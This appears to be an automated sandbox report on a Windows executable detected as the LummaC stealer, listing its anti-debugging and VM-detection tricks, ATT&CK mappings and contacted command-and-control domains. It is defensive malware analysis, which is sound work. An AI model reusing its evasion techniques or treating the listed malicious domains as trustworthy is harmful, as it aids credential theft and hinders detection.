    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7969C second address: D796A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DCF9 second address: D7DD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ecx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DD06 second address: D7DD0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E1F5 second address: D7E20C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB5F8D48013h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E20C second address: D7E210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E210 second address: D7E289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB5F8D48015h 0x0000000e nop 0x0000000f jmp 00007FB5F8D4800Ch 0x00000014 mov edx, dword ptr [ebp+122D3A8Dh] 0x0000001a push dword ptr [ebp+122D2E39h] 0x00000020 or dword ptr [ebp+122D2A50h], edx 0x00000026 call 00007FB5F8D48009h 0x0000002b jo 00007FB5F8D4800Eh 0x00000031 jns 00007FB5F8D48008h 0x00000037 push eax 0x00000038 pushad 0x00000039 push eax 0x0000003a jmp 00007FB5F8D48019h 0x0000003f pop eax 0x00000040 jo 00007FB5F8D4800Ch 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E289 second address: D7E2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FB5F8D48AC2h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E2B2 second address: D7E2CB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB5F8D4800Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E2CB second address: D7E2CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0C2E second address: 53E0C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0C34 second address: 53E0C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a pushad 0x0000000b mov di, 2CA0h 0x0000000f popad 0x00000010 jns 00007FB5F8D48B19h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0C50 second address: 53E0C6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48018h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0C6C second address: 53E0C72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0C72 second address: 53E0C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0C76 second address: 53E0CC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB5F8D48ABBh 0x00000011 and cx, 9EDEh 0x00000016 jmp 00007FB5F8D48AC9h 0x0000001b popfd 0x0000001c popad 0x0000001d mov eax, dword ptr [eax+00000860h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FB5F8D48ABDh 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0CC2 second address: 53E0CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0CC8 second address: 53E0CFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB5F8D48AC5h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0CFA second address: 53E0D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB5F8D4800Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0D0A second address: 53E0D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AE3CB2 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AE3D1C instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C8A8BA instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AE11B6 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CB2920 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 2740Thread sleep time: -60000s >= -30000sJump to behavior
    Source: file.exe, file.exe, 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: file.exe, 00000001.00000003.2219908926.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWYF"
    Source: file.exe, 00000001.00000002.2231066264.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.00000000015DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: file.exe, 00000001.00000002.2231007768.000000000155E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0o\
    Source: file.exe, 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC5BB0 LdrInitializeThunk,1_2_00AC5BB0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exe, file.exe, 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: *Program Manager
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping631
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Process Injection    		LSASS Memory24
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
    Obfuscated Files or Information    		NTDS23
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.ZPACK.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    steamcommunity.com0%VirustotalBrowse
    sergei-esenin.com11%VirustotalBrowse
    bathdoomgaz.store14%VirustotalBrowse
    licendfilteo.site16%VirustotalBrowse
    spirittunek.store14%VirustotalBrowse
    dissapoiznw.store14%VirustotalBrowse
    clearancek.site18%VirustotalBrowse
    studennotediw.store18%VirustotalBrowse
    eaglepawnoy.store18%VirustotalBrowse
    mobbipenju.store14%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://player.vimeo.com0%URL Reputationsafe
    https://player.vimeo.com0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steam.tv/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://lv.queniujq.cn0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://checkout.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/;0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://medal.tv0%URL Reputationsafe
    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://login.steampowered.com/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    https://recaptcha.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/0%URL Reputationsafe
    https://api.steampowered.com/0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://sergei-esenin.com/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
    https://www.youtube.com0%VirustotalBrowse
    https://www.google.com0%VirustotalBrowse
    https://steamcommunity.com/=l0%VirustotalBrowse
    https://sketchfab.com0%VirustotalBrowse
    https://www.youtube.com/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a0%VirustotalBrowse
    https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
    https://sergei-esenin.com:443/api14%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%VirustotalBrowse
    https://www.google.com/recaptcha/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%VirustotalBrowse
    https://steamcommunity.com/my/wishlist/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfm0%VirustotalBrowse
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%VirustotalBrowse
    https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/0%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    		104.102.49.254
    		truefalseunknown
    sergei-esenin.com
    		104.21.53.8
    		truetrueunknown
    eaglepawnoy.store
    		unknown
    		unknowntrueunknown
    bathdoomgaz.store
    		unknown
    		unknowntrueunknown
    spirittunek.store
    		unknown
    		unknowntrueunknown
    licendfilteo.site
    		unknown
    		unknowntrueunknown
    studennotediw.store
    		unknown
    		unknowntrueunknown
    mobbipenju.store
    		unknown
    		unknowntrueunknown
    clearancek.site
    		unknown
    		unknowntrueunknown
    dissapoiznw.store
    		unknown
    		unknowntrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    dissapoiznw.storectrue
      		unknown
      https://steamcommunity.com/profiles/76561199724331900true
      • URL Reputation: malware
      		unknown
      eaglepawnoy.storectrue
        		unknown
        spirittunek.storectrue
          		unknown
          studennotediw.storectrue
            		unknown
            licendfilteo.sitectrue
              		unknown
              clearancek.sitetrue
                		unknown
                bathdoomgaz.storectrue
                  		unknown
                  mobbipenju.storetrue
                    		unknown
                    https://sergei-esenin.com/apitrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://player.vimeo.comfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://sergei-esenin.com/file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015BD000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      https://store.steampowered.com/subscriber_agreement/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.gstatic.cn/recaptcha/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.valvesoftware.com/legal.htmfile.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.youtube.comfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.comfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://s.ytimg.com;file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://steam.tv/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://store.steampowered.com/privacy_agreement/file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://store.steampowered.com/points/shop/file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://steamcommunity.com/=ofile.exe, 00000001.00000002.2231066264.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.00000000015DA000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://steamcommunity.com/=lfile.exe, 00000001.00000003.2219908926.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015B0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://sketchfab.comfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://lv.queniujq.cnfile.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/?sufile.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
